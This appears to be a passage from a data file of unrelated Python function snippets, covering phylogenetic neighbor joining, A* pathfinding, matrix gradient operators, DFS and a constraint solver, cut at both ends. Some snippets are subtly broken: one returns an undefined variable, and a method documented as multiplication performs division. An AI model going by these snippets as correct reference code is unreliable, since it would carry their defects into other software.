(distance)\n\n\tprint \"\\tDone creating dictionary of node differences (%d pairs).\" % (len(distanceDict.keys()))\n\n\treturn nodeDict, distanceDict", "def perform(self, node, inputs, outputs):\r\n x = inputs[0]\r\n L = inputs[1]\r\n dz = inputs[2]\r\n dx = outputs[0]\r\n N = x.shape[0]\r\n if self.lower:\r\n F = numpy.tril(dz)\r\n for k in xrange(N - 1, -1, -1):\r\n for j in xrange(k + 1, N):\r\n for i in xrange(j, N):\r\n F[i, k] -= F[i, j] * L[j, k]\r\n F[j, k] -= F[i, j] * L[i, k]\r\n for j in xrange(k + 1, N):\r\n F[j, k] /= L[k, k]\r\n F[k, k] -= L[j, k] * F[j, k]\r\n F[k, k] /= (2 * L[k, k])\r\n else:\r\n F = numpy.triu(dz)\r\n M = N - 1\r\n for k in xrange(N - 1, -1, -1):\r\n for j in xrange(k + 1, N):\r\n for i in xrange(j, N):\r\n F[k, i] -= F[j, i] * L[k, j]\r\n F[k, j] -= F[j, i] * L[k, i]\r\n for j in xrange(k + 1, N):\r\n F[k, j] /= L[k, k]\r\n F[k, k] -= L[k, j] * F[k, j]\r\n F[k, k] /= (2 * L[k, k])\r\n dx[0] = F", "def add_nodes(self, new_nodes):\n self.nodes = self._nodes + ensure_list(new_nodes)\n for nd in ensure_list(new_nodes):\n self.predecessors[nd.name] = []\n self.successors[nd.name] = []\n if self._sorted_nodes is not None:\n # starting from the previous sorted list, so is faster\n self.sorting(presorted=self.sorted_nodes + ensure_list(new_nodes))", "def balances_to_path_nodes(balances_data, workers=1, hash_func=pedersen_hash):\n height = balances_data['tree_height']\n vaults_data = balances_data['vaults_data']\n balances = [(vault['vault_id'], vault) for vault in vaults_data]\n\n event_loop = asyncio.new_event_loop()\n\n with parallel_hash(hash_func, workers) as async_hash_func:\n try:\n res = event_loop.run_until_complete(\n calc_nodes(height, balances, calc_zero_nodes(height), 1, async_hash_func)\n )\n return res\n finally:\n event_loop.close()", "def updateClusters(LLE_node_vals, switch_penalty=1):\r\n (T, num_clusters) = LLE_node_vals.shape\r\n future_cost_vals = np.zeros(LLE_node_vals.shape)\r\n\r\n # compute future costs\r\n for i in range(T-2, -1, -1):\r\n j = i+1\r\n indicator = np.zeros(num_clusters)\r\n future_costs = future_cost_vals[j, :]\r\n lle_vals = LLE_node_vals[j, :]\r\n for cluster in range(num_clusters):\r\n total_vals = future_costs + lle_vals + switch_penalty\r\n total_vals[cluster] -= switch_penalty\r\n future_cost_vals[i, cluster] = np.min(total_vals)\r\n\r\n # compute the best path\r\n path = np.zeros(T)\r\n\r\n # the first location\r\n curr_location = np.argmin(future_cost_vals[0, :] + LLE_node_vals[0, :])\r\n path[0] = curr_location\r\n\r\n # compute the path\r\n for i in range(T-1):\r\n j = i+1\r\n future_costs = future_cost_vals[j, :]\r\n lle_vals = LLE_node_vals[j, :]\r\n total_vals = future_costs + lle_vals + switch_penalty\r\n total_vals[int(path[i])] -= switch_penalty\r\n\r\n path[i+1] = np.argmin(total_vals)\r\n\r\n # return the computed path\r\n return path", "def evaluate_cuts(base_tree, node):\n config = Configuration.config # Collect configuration\n\n N = config.normals # Collect predefined set of normal vectors\n N = np.append(N, node.auxiliary_normals, axis=0) # Append partition's bounding-box-aligned vectors as normals\n N = np.unique(np.round(N, 3), axis=0) # Return sorted unique elements of input array_like\n\n trees = []\n for i in range(N.shape[0]):\n trees_of_this_normal = [] # start a list of trees for splits along this normal\n normal = N[i] # current normal\n for plane in bsp_tree.get_planes(node.part, normal): # iterate over all valid cutting planes for the node\n tree, result = bsp_tree.expand_node(base_tree, node.path, plane) # split the node using the plane\n if tree: # only keep the tree if the split is successful\n trees_of_this_normal.append(tree)\n logger.debug(f\"normal index: {i}, origin: {plane[0]}, normal: {plane[1]}, result: {result}\")\n if len(trees_of_this_normal) == 0: # avoid empty list errors during objective function evaluation\n logger.info(f\"normal index: {i}, trees for normal: {len(trees_of_this_normal)}, total trees: {len(trees)}\")\n continue\n # go through each objective function, evaluate the objective function for each tree in this normal's\n # list, fill in the data in each tree object in the list\n for evaluate_objective_func in objectives.values():\n evaluate_objective_func(trees_of_this_normal, node.path)\n trees += trees_of_this_normal\n logger.info(f\"normal index: {i}, trees for normal: {len(trees_of_this_normal)}, total trees: {len(trees)}\")\n\n # go through the list of trees, best ones first, and throw away any that are too similar to another tree already\n # in the result list\n result_set = []\n for tree in sorted(trees, key=lambda x: x.objective):\n if tree.sufficiently_different(node, result_set):\n result_set.append(tree)\n logger.info(f\"{len(result_set)} valid trees\")\n return result_set", "def fn(n):\n if n == 1: return [TreeNode()]\n ans = []\n for nn in range(1, n, 2): \n for left in fn(nn):\n for right in fn(n-1-nn): \n ans.append(TreeNode(left=left, right=right))\n return ans", "def batch_predict(tree_adj, training_signs, edge_weight):\n # since shazoo use the revealed signs as-is, it's ok to use the same name\n training_signs, l2_values, rta_signs = training_signs\n all_nodes_to_predict = set(tree_adj) - set(training_signs)\n logging.debug('batch_predict has %d nodes to predict', len(all_nodes_to_predict))\n methods = ['l2cost', 'rta', 'shazoo']\n # fields are current_closest_hinge, current_sign, current_dst_to_closest_hinge\n node_predictions = {m: defaultdict(lambda: (None, None, 2e9)) for m in methods}\n hinge_value = {m: {} for m in methods}\n total_iter = 0\n while all_nodes_to_predict:\n some_root_of_a_border_tree = next(iter(all_nodes_to_predict))\n hinge_nodes, border_tree_nodes = find_hinge_nodes(tree_adj, edge_weight, training_signs,\n some_root_of_a_border_tree,\n with_visited=True)\n unmarked = border_tree_nodes - hinge_nodes\n for u in hinge_nodes:\n if u in hinge_value['shazoo']:\n continue\n vals, _, status = flep(tree_adj, (training_signs, rta_signs), edge_weight, u)\n hinge_value['shazoo'][u] = sgn(vals[0])\n hinge_value['rta'][u] = sgn(vals[1])\n if not USE_SCIPY:\n continue\n border_tree = build_border_tree_from_mincut_run(status, edge_weight)\n _, E, El, leaves_sign, _, _ = border_tree\n L = {u: l2_values[u] for u in leaves_sign}\n mapped_E, mapped_El_L, mapping = preprocess_edge_and_leaves(E, El, L)\n val = solve_by_zeroing_derivative(mapped_E, mapped_El_L, mapping, L,\n reorder=False)[0][u]\n hinge_value['l2cost'][u] = sgn(val)\n predicted_in_that_border_tree = set()\n inner_iter = 0\n # to avoid the same fork being picked again and again\n unmarked.add(some_root_of_a_border_tree)\n while unmarked:\n one_to_predict = next(iter(unmarked))\n hinge_tree = get_hinge_tree(one_to_predict, tree_adj, hinge_nodes)\n other_predicted = set()\n for h, h_val in iteritems(hinge_value['shazoo']):\n if h not in hinge_tree:\n continue\n predicted = propagate_hinge(hinge_tree, h, h_val, node_predictions['shazoo'],\n edge_weight)\n for u in predicted:\n prediction_info = node_predictions['shazoo'][u]\n used_hinge = prediction_info[0]\n node_predictions['rta'][u] = (used_hinge, hinge_value['rta'][used_hinge],\n prediction_info[2])\n if not USE_SCIPY:\n continue\n node_predictions['l2cost'][u] = (used_hinge, hinge_value['l2cost'][used_hinge],\n prediction_info[2])\n other_predicted.update(predicted)\n predicted_in_that_border_tree.update(other_predicted)\n unmarked -= other_predicted\n inner_iter += 1\n if inner_iter > len(tree_adj):\n import time\n logging.critical('batch predict failed in the inner loop')\n persistent.save_var('__fail_{}.my'.format(int(time.time())), (tree_adj, (training_signs, l2_values, rta_signs), edge_weight))\n raise RuntimeError('batch predict failed in the inner loop')\n all_nodes_to_predict -= predicted_in_that_border_tree\n total_iter += 1\n if total_iter > len(tree_adj):\n import time\n logging.critical('batch predict failed in the outer loop')\n persistent.save_var('__fail_{}.my'.format(int(time.time())), (tree_adj, (training_signs, l2_values, rta_signs), edge_weight))\n raise RuntimeError('batch predict failed in the outer loop')\n logging.debug('batch_predict has actually predicted %d nodes', len(node_predictions) - len(training_signs))\n return {m: {u: v[1] for u, v in iteritems(node_predictions[m]) if u not in training_signs}\n for m in methods}", "def nj(nodeL,distD):\n while len(nodeL) > 2:\n nodeA,nodeB = bestPair(nodeL,distD)\n bA, bB = branchLength(nodeA,nodeB,nodeL,distD)\n newNode= mergeNodes(nodeA, nodeB, bA, bB)\n updateDistances(nodeA,nodeB,newNode,nodeL,distD)\n nodeL.remove(nodeA)\n nodeL.remove(nodeB)\n nodeL.append(newNode)\n return terminate(nodeL,distD)", "def push_nodes_with_binary(self, b, step_ratio=0.1, niter=0):\n lid = list(self._data[:, 0])\n lpid = list(self._data[:, -2])\n t_data = self._data.copy()\n\n children_idx = {\n pid: [i for i, p in enumerate(lpid) if p == t_data[i, 0]] for pid in lpid\n }\n\n for _ in range(niter):\n for i in range(t_data.shape[0]):\n pid, radius, (x, y, z) = (\n int(t_data[i, -2]),\n t_data[i, -3],\n t_data[i, 2:5],\n )\n cidx = children_idx[pid]\n if pid != i and pid in lid and len(cidx) <= 1:\n px, py, pz = t_data[t_data[:, 0] == pid, 2:5][0]\n vnorm = norm_vec(np.asarray([x - px, y - py, z - pz]))\n\n if len(cidx) == 1:\n cx, cy, cz = t_data[cidx[0], 2:5]\n vnorm = (\n vnorm + norm_vec(np.asarray([cx - x, cy - y, cz - z]))\n ) / 2\n if all([v == 0 for v in vnorm]):\n continue\n\n pt = np.asarray([x, y, z])\n p_vectors = get_perpendicular_vectors(pt, vnorm)\n p_distances = [\n get_distance_to_boundary(pt, pvec, b) for pvec in p_vectors\n ]\n dx, dy, dz = np.sum(\n [pv * pd for pv, pd in zip(p_vectors, p_distances)], 0\n )\n\n # Constrain the displacement by the nodo radii\n tx = x + dx * step_ratio\n ty = y + dy * step_ratio\n tz = z + dz * step_ratio\n dist = (\n (tx - self._data[i, 2]) ** 2\n + (ty - self._data[i, 3]) ** 2\n + (tz - self._data[i, 4]) ** 2\n ) ** 0.5\n if dist <= radius / 2:\n t_data[i, 2] = tx\n t_data[i, 3] = ty\n t_data[i, 4] = tz\n else:\n pass\n self._data = t_data", "def _compute_ptdfs(self):\n z = self._compute_z()\n s = np.zeros([self.n_nodes, self.n_nodes, self.n_nodes])\n for k in range(self.n_nodes):\n for L in range(self.n_nodes):\n for i in range(self.n_nodes):\n if k == 0 and L != 0:\n s[k, L, i] = -1 * z[L-1, i-1]\n elif k != 0 and L == 0:\n s[k, L, i] = z[k-1, i-1]\n elif k != 0 and L != 0 and k != L:\n s[k, L, i] = z[k-1, i-1] - z[L-1, i-1]\n return s", "def root_nodes(self, node1, node2, distance):\n if node1 == node2.parent:\n upper_node = node1\n lower_node = node2\n upper_dist, lower_dist = distance, lower_node.branch - distance\n elif node2 == node1.parent:\n upper_node = node2\n lower_node = node1\n upper_dist, lower_dist = lower_node.branch - distance, distance\n else:\n raise PhyloValueError('root_nodes() requires that one of the given nodes is the parent of the other.')\n if len(self.root.children) <= 1:\n raise PhyloValueError('cannot re-root a tree where the existing root has one or no children.')\n elif len(self.root.children) == 2:\n if upper_node == self.root:\n # Just need to adjust branch lengths\n root_child = self.root.children[1] if self.root.children[0] == lower_node else self.root.children[0]\n root_child.branch += upper_dist\n lower_node.branch = lower_dist\n else:\n upper_path = self.find_path_to_root(upper_node)\n # Process the old root child after removing the root:\n root_child = self.root.children[1] if self.root.children[0] == upper_path[1] else self.root.children[0]\n root_child.branch += upper_path[1].branch\n root_child.parent = upper_path[1]\n upper_path[1].children.append(root_child)\n # Process nodes between root and upper_node:\n prev_node = upper_path[1]\n for next_node in upper_path[2:]:\n prev_node.children.remove(next_node)\n prev_node.parent = next_node\n next_node.children.append(prev_node)\n prev_node.branch = next_node.branch\n prev_node = next_node\n # Process upper_node, lower_node, and the new root\n upper_node.parent = lower_node.parent = self.root\n upper_node.children.remove(lower_node)\n self.root.children = [node1, node2] # Keeps the argument order\n upper_node.branch = upper_dist\n lower_node.branch = lower_dist\n else: # If the root has 3 children it means it's an unrooted tree\n new_root = self.new_tree_node()\n new_root.branch = self.root.branch # Transfers any existing root branch\n if upper_node != self.root:\n upper_path = self.find_path_to_root(upper_node)\n prev_node = self.root\n for next_node in upper_path[1:]:\n prev_node.children.remove(next_node)\n prev_node.parent = next_node\n next_node.children.append(prev_node)\n prev_node.branch = next_node.branch\n prev_node = next_node\n upper_node.children.remove(lower_node)\n upper_node.branch = upper_dist\n lower_node.branch = lower_dist\n new_root.children.append(upper_node)\n new_root.children.append(lower_node)\n upper_node.parent = lower_node.parent = new_root\n self.root = new_root\n self.process_tree_nodes()", "def sub_run1(new_node, distance):\n optimal_value[0] = optimal_value[0] + distance\n\n PL = get_node_points(new_node.left)\n P = get_node_points(new_node)\n PR = get_node_points(new_node.right)\n\n line1 = matrix.linear_eq((PL, P))\n line2 = matrix.linear_eq((PR, P))\n\n line1[2] = line1[2] * (-1)\n line2[2] = line2[2] * (-1)\n\n linear_list.append((new_node.left, new_node, line1))\n linear_list.append((new_node, new_node.right, line2))\n\n remove_eq(new_node)\n tspturtle.tsp_draw(PL, P, PR)\n\n remove(new_node)", "def neighborJoining(distances):\n\n tree = {}\n\n while(len(distances.keys()) > 2):\n\n r = calcRs(distances)\n M = makeMMatrix(distances, r)\n\n smallest = 10000\n smallestKey = (\"\",\"\")\n\n #Find nearest neighbors\n for key in M.keys():\n for subkey in M[key].keys():\n if M[key][subkey] < smallest:\n smallest = M[key][subkey]\n smallestKey = (key, subkey)\n\n #Add new node and update distances to rest of tree\n newname = smallestKey[0] + \"-\" + smallestKey[1]\n distances[newname] = {}\n tree[smallestKey[0]] = {}\n tree[smallestKey[1]] = {}\n dij = distances[smallestKey[0]][smallestKey[1]]\n for key in M.keys():\n if key in smallestKey:\n continue\n distances[newname][key] = .5*(distances[smallestKey[0]][key] \\\n + distances[smallestKey[1]][key] - dij)\n distances[key][newname] = distances[newname][key]\n\n #Update distances to parents of node\n dik = (dij + r[smallestKey[0]] - r[smallestKey[1]])/2\n tree[smallestKey[0]][newname] = dik\n tree[smallestKey[1]][newname] = dij-dik\n detachDict(distances, smallestKey[0], smallestKey[1])\n\n #Connect final two nodes\n tree[distances.keys()[0]] = {}\n tree[distances.keys()[0]][distances[distances.keys()[0]].keys()[0]] =\\\n distances[distances.keys()[0]][distances[distances.keys()[0]].keys()[0]] \n return tree", "def compute_operator(self, snapshots):\n\n # To avoid recursion function, use FIFO list to simulate the tree\n # structure\n data_queue = [snapshots.copy()]\n\n current_bin = 0\n while data_queue:\n Xraw = data_queue.pop(0)\n\n n_samples = Xraw.shape[1]\n\n step = max(1, int(np.floor(old_div(n_samples, self._nyq))))\n Xsub = Xraw[:, ::step]\n Xc = Xsub[:, :-1]\n Yc = Xsub[:, 1:]\n\n Xc, Yc = compute_tlsq(Xc, Yc, self._tlsq_rank)\n\n rho = old_div(float(self._max_cycles), n_samples)\n sub_operator = SubMrDMDOperator(svd_rank=self._svd_rank,\n eigs_divider=2. * np.pi * step, rho=rho)\n sub_operator.compute_operator(Xc, Yc)\n\n modes = sub_operator.modes\n eigs = sub_operator.eigenvalues\n Atilde = sub_operator.as_numpy_array\n b = sub_operator.compute_sub_amplitudes(Xc, self._opt)\n\n #---------------------------------------------------------------\n # DMD Amplitudes and Dynamics\n #---------------------------------------------------------------\n Vand = np.vander(np.power(eigs, old_div(1., step)), n_samples, True)\n\n Psi = (Vand.T * b).T\n\n self._modes.append(modes)\n self._b.append(b)\n self._Atilde.append(Atilde)\n self._eigenvalues.append(eigs)\n self._nsamples.append(n_samples)\n self._steps.append(step)\n\n if Xraw.dtype == 'float64':\n Xraw -= modes.dot(Psi).real\n else:\n Xraw -= modes.dot(Psi)\n\n if current_bin < 2**(self._max_level - 1) - 1:\n current_bin += 1\n half = int(np.ceil(old_div(Xraw.shape[1], 2)))\n data_queue.append(Xraw[:, :half])\n data_queue.append(Xraw[:, half:])\n else:\n current_bin += 1", "def solve(self):\n smallest_f = self.get_smallest_f_cost_unvisited_node()\n smallest_f_node = smallest_f[0]\n\n if smallest_f[1] > 1:\n current_node = self.get_smallest_h_cost_unvisited_node()\n else:\n current_node = smallest_f_node\n if current_node.f_cost == self.inf:\n return\n\n self.set_h_cost(current_node)\n self.unvisited_pos.remove(current_node.pos)\n self.visited_pos.append(current_node.pos)\n neighbours = algo_utils.get_neighbours(current_node, self.grid, self.wall_pos)\n\n for neigh in neighbours:\n neighbour_dist = neigh.g_cost\n current_dist = current_node.g_cost\n new_dist = current_dist + 1\n if neighbour_dist < new_dist:\n continue\n neigh.g_cost = new_dist\n self.set_h_cost(neigh)\n mix_neigh = {neigh.pos: neigh.g_cost}\n self.mix.update(mix_neigh)\n mix_current = {current_node.pos: current_node.g_cost}\n self.mix.update(mix_current)\n\n smallest_f = self.get_smallest_f_cost_unvisited_node()\n smallest_f_node = smallest_f[0]\n smallest_h_node = self.get_smallest_h_cost_unvisited_node()\n\n if (\n self.end_pos not in self.unvisited_pos\n or algo_utils.get_smallest_g_cost_unvisited_node(\n self.grid, self.unvisited_pos\n ).g_cost\n == self.inf\n ):\n for key, value in self.mix.items():\n self.mix[key] = round((value * 1.0) / self.end_node.g_cost, 3)\n self.backtrack_path(self.end_node)\n else:\n if smallest_f[1] > 1:\n current_node = smallest_h_node\n else:\n current_node = smallest_f_node\n self.solve()", "def newton_iteration(f: Callable, df: Callable, eps: float, x0: float = None, a: float = None, b: float = None,\n weight: float = 0.9, display: bool = False, max_iterations: int = 100) -> float:\n x = np.inf\n if x0 is None:\n x0 = (a + b) / 2\n if a is not None and b is not None and a == b:\n return a\n x_next = x0\n iterations = 0\n while abs(x - x_next) > eps and iterations < max_iterations:\n iterations += 1\n x = x_next\n\n if display:\n import matplotlib.pyplot as plt\n xx0 = a or x-1\n xx1 = b or x+1\n xx = np.linspace(xx0, xx1, 100)\n yy = np.array(list(map(f, xx)))\n plt.plot(xx, yy)\n plt.axvline(x=x)\n plt.show()\n\n f_x = f(x)\n try:\n df_x = df(x)\n except ZeroDivisionError:\n df_x = (f_x - f(x-eps))/eps\n if df_x != 0:\n x_next = x - f_x / df_x\n\n if a is not None and x_next < a:\n x_next = weight * a + (1 - weight) * x\n elif b is not None and x_next > b:\n x_next = weight * b + (1 - weight) * x\n\n if a is not None and x_next < a:\n x_next = a\n if b is not None and x_next > b:\n x_next = b\n\n return x_next", "def calc_new_cost(self, initial_node, to_node):\n\n cost = compute_distance(initial_node, to_node)\n return initial_node.cost + d", "def perform(self, node, inputs, outputs):\n x, w, v, W, V = inputs\n N = x.shape[0]\n outer = np.outer\n\n def G(n):\n return sum(\n v[:, m] * V.T[n].dot(v[:, m]) / (w[n] - w[m])\n for m in range(N)\n if m != n\n )\n\n g = sum(outer(v[:, n], v[:, n] * W[n] + G(n)) for n in range(N))\n\n # Numpy's eigh(a, 'L') (eigh(a, 'U')) is a function of tril(a)\n # (triu(a)) only. This means that partial derivative of\n # eigh(a, 'L') (eigh(a, 'U')) with respect to a[i,j] is zero\n # for i < j (i > j). At the same time, non-zero components of\n # the gradient must account for the fact that variation of the\n # opposite triangle contributes to variation of two elements\n # of Hermitian (symmetric) matrix. The following line\n # implements the necessary logic.\n out = self.tri0(g) + self.tri1(g).T\n\n # Make sure we return the right dtype even if NumPy performed\n # upcasting in self.tri0.\n outputs[0][0] = np.asarray(out, dtype=node.outputs[0].dtype)", "def a_star_alg(self, p1: int, p2: int, max_level: int = 1000):\r\n \r\n # Create start and end node\r\n start_node = Node(None, p1, self.node_dict[p1])\r\n start_node.g = start_node.h = start_node.f = 0\r\n end_node = Node(None, p2, self.node_dict[p2])\r\n end_node.g = end_node.h = end_node.f = 0\r\n\r\n # Initialize both open and closed list\r\n open_list = []\r\n closed_list = []\r\n\r\n # Add the start node\r\n open_list.append(start_node)\r\n\r\n # Loop until you find the end\r\n level = 0\r\n while len(open_list) > 0 and level < max_level:\r\n level += 1\r\n\r\n # Get the current node (the node in open_list with the lowest cost)\r\n current_node = open_list[0]\r\n current_index = 0\r\n for index, item in enumerate(open_list):\r\n if item.f < current_node.f:\r\n current_node = item\r\n current_index = index\r\n\r\n # Pop current off open list, add to closed list\r\n open_list.pop(current_index)\r\n closed_list.append(current_node)\r\n\r\n # Found the goal\r\n if current_node == end_node:\r\n path = []\r\n distance = current_node.g\r\n current = current_node\r\n while current is not None:\r\n path.append(current.number)\r\n current = current.parent\r\n\r\n return path[::-1], distance # Return reversed path\r\n\r\n # Generate children\r\n children = []\r\n for new_number in self.road_tree[current_node.number]: # Adjacent nodes\r\n new_node = Node(current_node, new_number, self.node_dict[new_number])\r\n children.append(new_node)\r\n\r\n # Loop through children\r\n for child in children:\r\n append_to_open_list = False\r\n\r\n # Create the f, g, and h values\r\n child.g = current_node.g + self.road_dict[(current_node.number, child.number)]\r\n child.h = sqrt((child.x - end_node.x) ** 2 + (child.y - end_node.y) ** 2) / 200\r\n child.f = child.g + child.h\r\n\r\n # Child is already in the closed list\r\n closed_list, append_to_open_list = self.check_in_list(child, closed_list, append_to_open_list)\r\n\r\n # Child is already in the open list\r\n open_list, append_to_open_list = self.check_in_list(child, open_list, append_to_open_list)\r\n\r\n # Add the child to the open list\r\n if append_to_open_list:\r\n open_list.append(child)\r\n\r\n return [], 1e10", "def _reconstruct_result(self, node, ss_result, backward=False):\n prev = ss_result['prev']\n ele_diff = ss_result['ele_diff']\n\n path = [node]\n ele_gain = 0.\n contributions = {} # Of each node, to the cumulative elevation gain\n dist = ss_result['dist']\n\n if backward:\n # 'node' is the start point and so does not contribute to ele_gain\n contributions[node] = 0.\n else:\n # The ele diff between 'node' (first on the path) and next node\n # on the path toward the source\n contributions[node] = max([0., ele_diff[node]])\n ele_gain += contributions[node]\n\n # Follow backpointers to reconstruct path and compute statistics\n successor = node\n curr_node = prev[node]\n while curr_node is not None:\n path.append(curr_node)\n if backward:\n # ele_diff's were computed moving forward toward 'node', so we\n # must be careful to get the right contribution here\n contribution = max([0., -ele_diff[successor]])\n else:\n contribution = max([0., ele_diff[curr_node]])\n contributions[curr_node] = contribution\n ele_gain += contributions[curr_node]\n curr_node = prev[curr_node]\n successor = curr_node\n\n # Since path was built by appending and backtracking, need to\n # reverse it if 'node' is supposed to be the terminus\n if not backward:\n path.reverse()\n\n # Not yet a SearchResult: more processing needed in merge step\n result = {\n 'path': path,\n 'path_len': dist[node],\n 'ele_gain': ele_gain,\n 'contributions': contributions,\n 'dist': dist\n }\n\n return result", "def steepest_descent_f(init_x0, init_x1, alpha, n=5):\n ret = [(init_x0, init_x1)]\n a = init_x0\n b = init_x1\n for i in range(n):\n a1 = a - alpha * gradF1(a, b)\n b1 = b - alpha * gradF2(a, b)\n ret.append((a1, b1))\n a = a1\n b = b1 \n \n return ret", "def run_trial(self, num_nodes): \n # compute the neighbors for the newly-created node\n new_node_neighbors = set()\n for dummy_idx in range(num_nodes):\n new_node_neighbors.add(random.choice(self._node_numbers))\n # update the list of node numbers so that each node number \n # appears in the correct ratio\n\n # add num_nodes (= new node number) to list\n self._node_numbers.append(self._num_nodes)\n\n # add new neighbours to the list\n self._node_numbers.extend(list(new_node_neighbors))\n\n # update the number of nodes\n self._num_nodes += 1\n\n return new_node_neighbors", "def compute(self, node, input_vals):\r\n \"\"\"TODO: Your code here\"\"\"\r\n \"\"\"Given values of two input nodes, return result of element-wise multiplication.\"\"\"\r\n assert len(input_vals) == 2\r\n return input_vals[0] / input_vals[1]", "def deltaCalc(self, expected):\n \n n = len(self.structure)\n self.delta = [None] * n\n self.delta[n - 1] = []\n \n for i in xrange(len(expected)):\n curr = self.a[n - 1][i]\n self.delta[n - 1].append(self.derivativeFunc(curr) * (expected[i] - curr))\n self.delta[n - 1] = np.array(self.delta[n - 1])\n \n # From n - 1 to 1 layer \n for i in xrange(n - 1, 0, -1):\n currDelta = self.delta[i]\n if i != (n - 1):\n currDelta = currDelta[0][:-1]\n \n self.delta[i - 1] = np.array(np.dot(currDelta, self.theta[i]))\n self.delta[i - 1][0] *= self.a[i - 1]\n \n return", "def build(self, dist_matrix, class_map, cluster_naming_function):\n # Update attributes\n self.orig_dist_matrix = dist_matrix \n self.class_map = class_map \n self.work_dist_matrix = dist_matrix\n\n # Get number of elements\n n = dist_matrix.shape[0]\n\n if PROGRESS:\n print 'Starting tree build now!'\n\n # Loop through n-3 elements & add nodes in tree\n for i in range(n - 3):\n\n if DEBUG:\n print 'Distance Matrix'\n pprint(self.work_dist_matrix)\n print\n\n # Calculate q_matrix matrix from distances\n q_matrix = _calculate_q_matrix(self.work_dist_matrix)\n \n if DEBUG:\n print 'Q matrix:'\n pprint(q_matrix)\n print\n\n # Find pair of elements (i,j) where q_matrix(i,j) has the lowest value\n (min_col, min_row) = _find_min_pair(q_matrix)\n\n # Add nodes i,j, and cluster node of i and j to this tree\n # And update working distance matrix accordingly\n new_cluster_name = cluster_naming_function(min_row, min_col, self.cluster_map)\n self.cluster_leaves(min_row, min_col, new_cluster_name) \n\n if DEBUG:\n print 'Tree:'\n pprint(nx.clustering(self.tree))\n pprint(self.cluster_dictionary)\n print '\\n\\n'\n \n # View graph after each step for debugging\n if VIEW_ALL:\n labels = {i[0]: i[0]+'/'+i[1]['c'] for i in njt.tree.nodes(data=True)}\n layout = nx.spring_layout(njt.tree)\n nx.draw_networkx(njt.tree, pos=layout, with_labels=True, labels=labels) #class labels\n plt.show()\n\n if PROGRESS:\n print str(i + 1) + \" down, \" + str(n-i-4) + \" to go...\"\n \n # Add remaining branch lengths and nodes from working distance matrix to this tree \n previous_cluster = new_cluster_name\n mid_edge_length = 0.5 * (self.work_dist_matrix.iat[0, 1]\n + self.work_dist_matrix.iat[0, 2]\n - self.work_dist_matrix.iat[1, 2])\n (node1, node2) = (self.work_dist_matrix.columns[0], self.work_dist_matrix.columns[1])\n new_cluster = cluster_naming_function(node1, node2, self.cluster_map)\n self.cluster_leaves(node1, node2, new_cluster)\n # Viz only scales based on a weight attribute, so we set that as the length\n self.tree.add_edge(previous_cluster, new_cluster, length=mid_edge_length, weight=mid_edge_length)\n\n if DEBUG:\n print 'Final tree:'\n pprint(nx.clustering(self.tree))\n pprint(self.cluster_dictionary)", "def _DFS_loop(nodes, edges, t_n=None):\n\n if t_n is not None:\n n_t = dict((b,a) for a,b in t_n.items()) # {time: node}\n get_node_by_time = lambda time: time if t_n is None else n_t[time]\n get_time_by_node = lambda node: node if t_n is None else t_n[node]\n gen_edges = lambda node: map(get_time_by_node,edges[get_node_by_time(node)])\n\n explored = set()\n leader = dict()\n _DFS_loop.t = 0 # finishing time\n times = dict() # {time: node}\n\n def DFS(i):\n explored.add(i)\n leader[i] = s\n for j in gen_edges(i):\n if j not in explored:\n DFS(j)\n _DFS_loop.t += 1\n times[i] = _DFS_loop.t\n\n for i in nodes:\n if i not in explored:\n s = i # leader node\n DFS(i)\n\n leaders = defaultdict(list)\n for n,l in leader.items():\n leaders[get_node_by_time(l)].append(get_node_by_time(n))\n\n return times, leaders", "def solve_csp(nodes, arcs, max_steps):\n\n nodes = list(nodes)\n print 'nodes:', nodes\n\n node_values_dict = dict(zip(nodes, '2'*len(set(nodes))))\n print 'initial random assignment', node_values_dict\n indexes = np.arange(len(nodes))\n\n graph = {}\n for arc in arcs:\n if not arc[0] in graph:\n graph[arc[0]] = []\n if not arc[1] in graph:\n graph[arc[1]] = []\n graph[arc[0]].append(arc[1])\n graph[arc[1]].append(arc[0])\n for i in indexes:\n if i in graph:\n continue\n else:\n graph[i] = []\n graph = dict(sorted(graph.items()))\n print 'graph:', graph\n\n domain = [i for i in np.arange(1, 10, 1)]\n print 'initial domain for each node:', domain\n\n superAdjacency ={}\n for i in np.arange(len(nodes)):\n superAdjacency[i] = []\n superAdjacency[i].append(nodes[i])\n superAdjacency[i].append(node_values_dict[nodes[i]])\n superAdjacency[i].append(graph[i])\n superAdjacency[i].append(domain)\n\n print 'superAdjacency', superAdjacency\n\n def getNodeType(superAdjacency, index):\n return list(superAdjacency[index])[0]\n\n def getCurrentAssignment(superAdjacency, index):\n return list(superAdjacency[index])[1]\n\n def getCurrentAssignmentForList(superAdjacency, indexList):\n return [int(list(superAdjacency[index])[1]) for index in indexList]\n\n def getSolution(superAdjacency):\n return [int(list(superAdjacency[index])[1]) for index in superAdjacency]\n\n def getNeighbours(superAdjacency, index):\n return list(superAdjacency[index])[2]\n\n def getDomain(superAdjacency, index):\n return list(superAdjacency[index])[3]\n\n def updateSuperAdjacency(superAdjacency, nodeType, newValue):\n updateList =[]\n for i in superAdjacency:\n if str(getNodeType(superAdjacency, i)) == nodeType:\n updateList.append(i)\n for i in updateList:\n superAdjacency[i][1] = newValue\n\n def isSolution():\n return graphConstraints(superAdjacency)\n\n def graphConstraints(superAdjacency):\n graphEval = []\n\n for index in superAdjacency:\n neighbours = getNeighbours(superAdjacency, index)\n nodeType = getNodeType(superAdjacency, index)\n\n if nodeType == 'T':\n graphEval.append(int(str(eval(str(\n getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[0]))\n elif nodeType == 'C':\n return 'NA'\n elif nodeType == 'S':\n graphEval.append(int(str(eval(str(\n getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[::-1][0]))\n elif nodeType == 'H':\n graphEval.append(int(str(np.sum(\n getCurrentAssignmentForList(superAdjacency, neighbours)))[0]))\n if nodeType == 'P':\n graphEval.append(int(str(np.sum(\n getCurrentAssignmentForList(superAdjacency, neighbours)))[::-1][0]))\n\n currentAssignment = [item[1] for item in superAdjacency.values()]\n difference = map(sub, currentAssignment, graphEval)\n\n if sum(difference) == 0:\n return True\n else:\n return difference\n\n def findConflictVariable(superAdjacency, lastUpdateNode):\n node_conflict_count = {}\n for node in node_values_dict:\n node_conflict_count[node] = 0\n for index in superAdjacency:\n neighbours = getNeighbours(superAdjacency, index)\n nodeType = getNodeType(superAdjacency, index)\n if nodeType == 'T':\n try:\n if getCurrentAssignment(superAdjacency, index) != \\\n int(str(eval(str(getCurrentAssignmentForList(superAdjacency, neighbours)).replace(',', '*'))[0])[0]):\n 